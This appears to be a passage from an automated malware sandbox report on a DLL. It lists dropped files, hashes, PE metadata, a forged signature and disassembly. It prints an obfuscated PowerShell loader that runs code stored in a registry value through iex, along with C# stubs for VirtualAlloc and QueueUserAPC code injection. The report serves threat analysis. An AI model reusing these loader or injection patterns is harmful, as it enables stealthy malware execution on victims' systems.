                          Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.0.cs"
                          C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.dll
                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):3584
                          Entropy (8bit):2.6349672358126073
                          Encrypted:false
                          SSDEEP:24:etGSD8+mUE7R85z7woel/gx4/eiDPtkZfZzwLDZ0WI+ycuZhNtakS7PNnq:6BXE7S5gGjiyJZzwZX1ulta3xq
                          MD5:90EE0F91FF3E5AC8250C42785D163FB7
                          SHA1:13276BD1000D8F797C73C9B4BCA08127868C1EC9
                          SHA-256:E7251525735F9C3302CDE3DBF5F1796096283241712C20F38F5C4F64EA73070D
                          SHA-512:921B418BE5E4FC2F4D49CBCE1B323721E125F50C832A8E5A66037C7EB41230D29113DA342EF0A050A0DD9423A3AE96562D67682CF84D06DF77001A879A5B6E49
                          Malicious:false
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a...........!.................$... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..d.............................................................(....*BSJB............v4.0.30319......l...H...#~......D...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................2.+...............(...................................... 9............ F............ Y.....P ......d.........j.....v.....{.....................d. ...d...!.d.%...d.......*.....3.;.....9.......F.......Y...........
                          C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.out
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                          Category:modified
                          Size (bytes):868
                          Entropy (8bit):5.320077744261521
                          Encrypted:false
                          SSDEEP:24:AId3ka6KzXE2V4KaM5DqBVKVrdFAMBJTH:Akka6aXE2V4KxDcVKdBJj
                          MD5:5D4927D1B228C0B04BE990A5CF5142D1
                          SHA1:BA0F046F862F9C11763D08A4CF8D3920EA250AD1
                          SHA-256:4C6B817FC7F440DE8C31AD988B1CCEA218531E2BCC2FDDBBF79F1AC6EA07E95E
                          SHA-512:94F287FF11ACB9E1772EF97E61C2B408DC85086F92DCBDECB69D6180F67EC2F3DCD7BAED33CCDB9E8F2CD507E458D07298962F8C62B481AEA9F39B293C0BDE9D
                          Malicious:false
                          Preview: .C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                          C:\Users\user\AppData\Local\Temp\wfv0d1vy\wfv0d1vy.0.cs
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text
                          Category:dropped
                          Size (bytes):395
                          Entropy (8bit):5.011724479977666
                          Encrypted:false
                          SSDEEP:6:V/DsYLDS81zuJZFMRSRa+eNMjSSRrh+SRNdDQaAntHQy:V/DTLDfuHV9eg5rh14aAntwy
                          MD5:B1DA1EF961AA0CE50C236459261D955A
                          SHA1:99CF19F188248557193608FE42C1CB88FCF234E1
                          SHA-256:139659D9C1D794242DE8DEFB1E33C785B3B63A691230874656B2B1AFC9E0B26B
                          SHA-512:27C4E9D4D1926A87EB5A2CAFD768D80A9D566C5FE9C7EB17F87453698415B30E251816738388C3171519A74B20AB0919C47C04A1E6CF9E1D82547540DF5E1682
                          Malicious:false
                          Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class ufc. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint ylpxxdj,uint gtjjej);.[DllImport("kernel32")].public static extern IntPtr VirtualAlloc(IntPtr mmpi,uint xkljddbswyg,uint jfalf,uint iqbvunafhnr);.. }..}.
                          C:\Users\user\AppData\Local\Temp\wfv0d1vy\wfv0d1vy.cmdline
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                          Category:dropped
                          Size (bytes):371
                          Entropy (8bit):5.255365080899839
                          Encrypted:false
                          SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923fiVCWzxs7+AEszI923fiVCr:p37Lvkmb6KzKVCWWZE2KVCr
                          MD5:7C6E6D084FD264B37BCD7CC2BFAF1523
                          SHA1:197FBFFC51C699B27EB6EB0C914E044103B1503E
                          SHA-256:1EAA871B794C66E8F63C4EAC98E9110E562B64B2C81CE1F4B380ACF378EA0BB1
                          SHA-512:51B70D5DB9523935220EBD45501021056DEC17D6CFD1A016FF19060E8B5980E809F468D040F06ADBF8F013093301D2106286136F2F818153CC127E9AA3442277
                          Malicious:false
                          Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\wfv0d1vy\wfv0d1vy.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\wfv0d1vy\wfv0d1vy.0.cs"
                          C:\Users\user\AppData\Local\Temp\wfv0d1vy\wfv0d1vy.out
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                          Category:dropped
                          Size (bytes):868
                          Entropy (8bit):5.335054980168907
                          Encrypted:false
                          SSDEEP:24:AId3ka6KzKwnE2KwqKaM5DqBVKVrdFAMBJTH:Akka6aPE2iKxDcVKdBJj
                          MD5:D25692BE4A7B9E0D1859FED2E0B81B64
                          SHA1:5686819FE68A92F329686AEDF4CDD3CC8DA92609
                          SHA-256:D1260E5FC02624D38E533E5DB33FC83912F8A907509D4C1809BAB069CDDB8912
                          SHA-512:3560116FF740032B6B93CA22BDB32481B7CDEFEAC20A1577F1B95FD465B04F5281AED4F4DFD25C3B5CABEF38073ED50421991A8D62B3E22E7B62FE47CD62CB5D
                          Malicious:false
                          Preview: .C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\wfv0d1vy\wfv0d1vy.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\wfv0d1vy\wfv0d1vy.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                          C:\Users\user\AppData\Local\Temp\wklr4juq\CSC206B99537D694137B0FEEBD968CAD59B.TMP
                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                          File Type:MSVC .res
                          Category:dropped
                          Size (bytes):652
                          Entropy (8bit):3.1139785671928237
                          Encrypted:false
                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryGak7Ynqq0PN5Dlq5J:+RI+ycuZhNoakS0PNnqX
                          MD5:74AC8729B044EF3E55CA0A024EFF165F
                          SHA1:CBFB0EA2703141E51FB43DA9F9288DA871566FB7
                          SHA-256:C9AF660105465928BE198DBDEB8D4BE5BA9D1B3048299AEB4CA1678D0E829480
                          SHA-512:E4B800C3568143FB841E0B86831C9ECFE1165EB81A17A885755C419CE4DA1E9CAEEA927893336E8F5F0EADACA2295DB5AA983F18D8E2E48A71846F4BFC87BFCA
                          Malicious:false
                          Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...w.k.l.r.4.j.u.q...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...w.k.l.r.4.j.u.q...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                          C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.0.cs
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text
                          Category:dropped
                          Size (bytes):414
                          Entropy (8bit):5.049516587690195
                          Encrypted:false
                          SSDEEP:6:V/DsYLDS81zuJwMRSR7a1f892RV9SRa+rVSSRnA/fsTfaskNDVzy:V/DTLDfuEB92Ru9rV5nA/ETf5EDVzy
                          MD5:66D77EA7A947B910D56CFB0FC4B85BE6
                          SHA1:9D503A2C0DDAEE23A81802CA8444D8B7039ECE6B
                          SHA-256:66E86036222F5D3B474370BBBA04C4A7DECC42D05D25675846CBA63F16877D8B
                          SHA-512:A53181798E577ABD31EE4063903E62171903B369B4FF26C337CC0108BE8883BEE39000A858FB24E92D13CDB89EF5782AADF06B7BD6807DD2D46458F813EE772B
                          Malicious:false
                          Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class yarnha. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr nafifqdmhmh,IntPtr uyeb,IntPtr hpistj);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint ykuvjce,uint ibkrrfwtfdq,IntPtr ljhqnvahhfq);.. }..}.
                          C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.cmdline
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                          Category:dropped
                          Size (bytes):371
                          Entropy (8bit):5.28862302275331
                          Encrypted:false
                          SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923fPt10zxs7+AEszI923fPtdx:p37Lvkmb6KzMWZE2p
                          MD5:FEC723AE4CE1D4A72A48375DAE57F152
                          SHA1:7D0E0234A688710DE2AFE91CBDAA0F7EDC5449C4
                          SHA-256:AF7C1A6DBC10AA5EBB5D72297108D245410FB5FB55D48E3386E4799963732300
                          SHA-512:F018829EA6161344C82F9D46ADA4599BD8C86390DDA4048A59359DB7CC7DDCC052E55B8F893292408EE8D11F5C956A14B79279F119039E799C97D3B6EC77FA6C
                          Malicious:false
                          Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.0.cs"
                          C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.dll
                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):3584
                          Entropy (8bit):2.64310436733059
                          Encrypted:false
                          SSDEEP:24:etGSR8+mUE7R85z7woel/gYp94/eiDPtkZfEPFXmSDZ0WI+ycuZhNoakS0PNnq:6nXE7S5gGYpXiyJmFXm0ZX1uloa3Uq
                          MD5:E78B4F20C9C3ECDFAADE20B23787EBCB
                          SHA1:B89C1EC666680DA7AB129A0F5E9A593625D94201
                          SHA-256:0CF920EAE8AD9733EB1FEAE76CAE748499E334BD5AF3B8E6F0D1940810C3D7F2
                          SHA-512:87CA675464DED2449A4BC6AD61202FA04F00D1AF173D1BF3E471CC5413A85C204EA967C27177FC37A4E80B7E5E31258FA41C0081FF35638F42CC28429D3AC532
                          Malicious:false
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a...........!.................$... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..d.............................................................(....*BSJB............v4.0.30319......l...H...#~......D...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................2.+...............(...................................... 9............ F............ Y.....P ......d.........j.....v.....{.....................d. ...d...!.d.%...d.......*.....3.;.....9.......F.......Y...........
                          C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.out
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                          Category:modified
                          Size (bytes):868
                          Entropy (8bit):5.348694375232745
                          Encrypted:false
                          SSDEEP:12:xKIR37Lvkmb6KzMWZE2sKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:AId3ka6Kz9E2sKaM5DqBVKVrdFAMBJTH
                          MD5:D86ACBAA58E203B2849D410C07220578
                          SHA1:22F3A10EF4FB73B6A76D6FA4C6DCC7D8E6842A83
                          SHA-256:9FEC93CFFFF08573DED5958B966582FAC2EB57E68469BF94850C73385625AB86
                          SHA-512:4C56050C5B07C3C13FEFCF808D5E9B28BDC724255406C6A01167949E7E036623E544F32E2B6C16526B4A02BFB52F3DD887F5F362AB856BB5679834C87A68524B
                          Malicious:false
                          Preview: .C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                          C:\Users\user\Documents\20211214\PowerShell_transcript.841675.6dNuCqGT.20211214103418.txt
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                          Category:dropped
                          Size (bytes):1359
                          Entropy (8bit):5.406002359282101
                          Encrypted:false
                          SSDEEP:24:BxSAPzDvBB/x2DOXUWnpLCHm4XWUHjeTKKjX4CIym1ZJXXB/pLCHm4StnxSAZ7t:BZP/v//oOHKm4GUqDYB1Z9B/Km4SRZZR
                          MD5:51B9F4D065CD36EEB47C62B81AFB7F06
                          SHA1:BCFD8E1BD2F58F4F3F3150F672857CF45E23BC2A
                          SHA-256:FAF75023385D35770B9D01F760C1876E1E25445A6D9C839CDAE71091453519F8
                          SHA-512:2BC504F6988648C5FA1DEF96CA3B22A0CC01AD926334F4FB0271D0FA324304F00CF6FBEE76A575C72EFF27D6C4C45BC19DB97E463E175CC38B6793219BD020E6
                          Malicious:false
                          Preview: .**********************..Windows PowerShell transcript start..Start time: 20211214103419..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 841675 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UtilDiagram))..Process ID: 7012..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211214103419..**********************..PS>new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq
                          C:\Users\user\Documents\20211214\PowerShell_transcript.841675.DMr5Wv1u.20211214103418.txt
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                          Category:dropped
                          Size (bytes):1359
                          Entropy (8bit):5.403706904252732
                          Encrypted:false
                          SSDEEP:24:BxSAPzDvBB/x2DOXUWnpLCHm4XWiHjeTKKjX4CIym1ZJXXJpLCHm4StOnxSAZ7iq:BZP/v//oOHKm4GiqDYB1Z9JKm4SaZZ7d
                          MD5:7291ABA011A1193C203450F5D3512461
                          SHA1:310F781764BB9AC8A8D3B7F14E38AD05EE18730C
                          SHA-256:0FA2BD16F02EEC7CA811D01D14782EC171D0A7E6AC1C4439C87B2E6A0C6536C4
                          SHA-512:C2BAB621C1E45A10BEC063ED6F84F63BD94D8533B83FC22A552BA35791A25B0254CF95F3341DC46CE4C6ED63D9698E2114A4A17D3F25BC38B6305B5A257955D9
                          Malicious:false
                          Preview: .**********************..Windows PowerShell transcript start..Start time: 20211214103420..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 841675 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UtilDiagram))..Process ID: 7160..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211214103420..**********************..PS>new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq
                          C:\Users\user\Documents\20211214\PowerShell_transcript.841675.ZSxBE1Sk.20211214103425.txt
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                          Category:dropped
                          Size (bytes):1146
                          Entropy (8bit):5.544628786712
                          Encrypted:false
                          SSDEEP:24:BxSAPJDvBB/x2DOXUWnpLCHm4XW/HjeTKKjX4CIym1ZJXX7pLCHm4v:BZPhv//oOHKm4G/qDYB1Z97Km4v
                          MD5:E0C308808C66AB01D5B3EF7C3856B1D5
                          SHA1:13F36AB3AAEA583989B9C72E15A29F8F49EC8B2A
                          SHA-256:EA41567677F8A22C46060C26ACB8AE2B68B789283782A6096F264A4DBF25468D
                          SHA-512:3EF71D741446DA480EEA5ECDDF428571059A11C2516C8287FA5A891426E1014D9C41649F5D1912D748379F93468DD1C7EB8A9AC14CCD3FFEFBF292E3C707EE4E
                          Malicious:false
                          Preview: .**********************..Windows PowerShell transcript start..Start time: 20211214103426..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 841675 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UtilDiagram))..Process ID: 3532..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211214103426..**********************..PS>new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq
                          C:\Users\user\Documents\20211214\PowerShell_transcript.841675.g3ZPtttJ.20211214103418.txt
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                          Category:dropped
                          Size (bytes):1146
                          Entropy (8bit):5.542879881063877
                          Encrypted:false
                          SSDEEP:24:BxSAPzDvBB/x2DOXUWnpLCHm4XWnHjeTKKjX4CIym1ZJXXB/pLCHm4v:BZP/v//oOHKm4GnqDYB1Z9B/Km4v
                          MD5:635442A47792E7CA6AB6C67E60181544
                          SHA1:1476DE8E879BA1B92742F3F951AECE56DE2A882A
                          SHA-256:C9026B19F44A3E5A20EA9A2F355703C5BC988246CC98D0EE2228333766324050
                          SHA-512:6621F0DB6601D61F5736EB95425F4590ADB546FA422ACC627F4A26544387BA9F274D9A5B13E54DA30228EEBD8EB4DE76CE125A435080D46A6FC5A502FAF2646F
                          Malicious:false
                          Preview: .**********************..Windows PowerShell transcript start..Start time: 20211214103419..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 841675 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UtilDiagram))..Process ID: 7132..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211214103419..**********************..PS>new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq

                          Static File Info

                          General

                          File type:MS-DOS executable, MZ for MS-DOS
                          Entropy (8bit):5.270863171013114
                          TrID:
                          • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                          • Generic Win/DOS Executable (2004/3) 0.20%
                          • DOS Executable Generic (2002/1) 0.20%
                          • VXD Driver (31/22) 0.00%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:6.dll
                          File size:1781920
                          MD5:ac57d694b86d8532b38d3d62f6de3afc
                          SHA1:c858ec742ba91bf8c139b7bb654ca2d67747c5ef
                          SHA256:fa668d1a58b3b92d9c1b9a740facfaebb35dd723deaf5a3833592208a8a47e5e
                          SHA512:cd9635d667a43c0d6715ec05c114c424b3f1292d7997c8d6c86f937ff81a08262763d33621c7d75d3c2a5fac75b58c71489fe3360fd4a2d6c804e7a72a06683b
                          SSDEEP:49152:JOMo8UQw8MT8UQw8MT8UQw8MT8UQw8MT8UQw8MT8UQw8Mc:xo8UQw8MT8UQw8MT8UQw8MT8UQw8MT8Z
                          File Content Preview:MZ......................................................................!..L.!This .ro.ra. cannot be run in DOS m.de....$.......PE..L...[..a...........!....................................................................................................V..

                          File Icon

                          Icon Hash:82b0f4c6d2c66cb1

                          Static PE Info

                          General

                          Entrypoint:0x1001f3fe
                          Entrypoint Section:.text
                          Digitally signed:true
                          Imagebase:0x10000000
                          Subsystem:windows gui
                          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                          DLL Characteristics:
                          Time Stamp:0x61B6D25B [Mon Dec 13 04:55:55 2021 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:4
                          OS Version Minor:0
                          File Version Major:4
                          File Version Minor:0
                          Subsystem Version Major:4
                          Subsystem Version Minor:0
                          Import Hash:90a569c76737ac6eae14ae164dabea89

                          Authenticode Signature

                          Signature Valid:false
                          Signature Issuer:CN=DigiCert SHA2 Assured ID Code Signing CA, OU=www.digicert.com, O=DigiCert Inc, C=US
                          Signature Validation Error:The digital signature of the object did not verify
                          Error Number:-2146869232
                          Not Before, Not After
                          • 10/1/2020 5:00:00 PM 12/18/2023 4:00:00 AM
                          Subject Chain
                          • CN=OpenJS Foundation, O=OpenJS Foundation, L=San Francisco, S=California, C=US
                          Version:3
                          Thumbprint MD5:8E8056A2284F0304445ED325353454BF
                          Thumbprint SHA-1:E16BB6EE4ED3935C46C356D147E811286BA4BBFE
                          Thumbprint SHA-256:968F9536C18A4475095B37792855AA62306275DEC05BD72F21653C98026CFC4E
                          Serial:038EDB2FC6E405731A760F1516144C85

                          Entrypoint Preview

                          Instruction
                          mov ebx, edi
                          or ebx, edi
                          jmp 00007FD68CC158E2h
                          ret
                          ret
                          pop ecx
                          push esi
                          pop ebx
                          ret
                          mov edi, dword ptr [1000335Ch]
                          call 00007FD68CC147C8h
                          mov esp, dword ptr [ebp-18h]
                          mov word ptr [100030FCh], es
                          mov ecx, dword ptr [ebp-04h]
                          lea ebp, dword ptr [esp+10h]
                          int3
                          int3
                          push ebp
                          push edi
                          mov dword ptr [10003120h], eax
                          push eax
                          je 00007FD68CC144B6h
                          int3
                          mov dword ptr fs:[00000000h], ecx
                          mov eax, dword ptr [ebp+0Ch]
                          mov ecx, edi
                          push eax
                          jmp dword ptr [100040BCh]
                          add ecx, eax
                          mov eax, dword ptr [ecx]
                          cmp edi, ecx
                          mov eax, dword ptr [ecx]
                          push 10000000h
                          mov eax, dword ptr [ebp-14h]
                          push 00000000h
                          push 1001E268h
                          ret
                          xor esi, esi
                          xor esi, esi
                          xor esi, esi
                          pop eax
                          int3
                          int3
                          int3
                          mov esp, dword ptr [ebp-18h]
                          int3
                          jmp dword ptr [10004078h]
                          pop ebx
                          sete cl
                          call 00007FD68CC14373h
                          int3
                          mov ecx, edi
                          ret
                          jmp dword ptr [1000406Ch]
                          ret
                          call 00007FD68CC1407Ch
                          int3
                          int3
                          mov word ptr [100030F8h], fs
                          cmp dword ptr [10003010h], 00000000h
                          int3
                          int3
                          int3
                          call 00007FD68CC1453Fh
                          int3
                          int3
                          mov ebp, esp
                          push dword ptr [ebp+08h]
                          int3
                          sub al, cl
                          jmp 00007FD68CC170D8h
                          int3
                          int3
                          int3
                          push eax
                          mov dword ptr [ebp-04h], eax
                          int3
                          cmp dword ptr [00000000h], 00000000h

                          Data Directories

                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x1cff00x56.text
                          IMAGE_DIRECTORY_ENTRY_IMPORT0x43d040xb4.data
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x470000x16f8e8.rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x1b18000x18a0.rsrc
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x1b70000x6ec.reloc
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0x28d060x27c.data
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                          Sections

                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
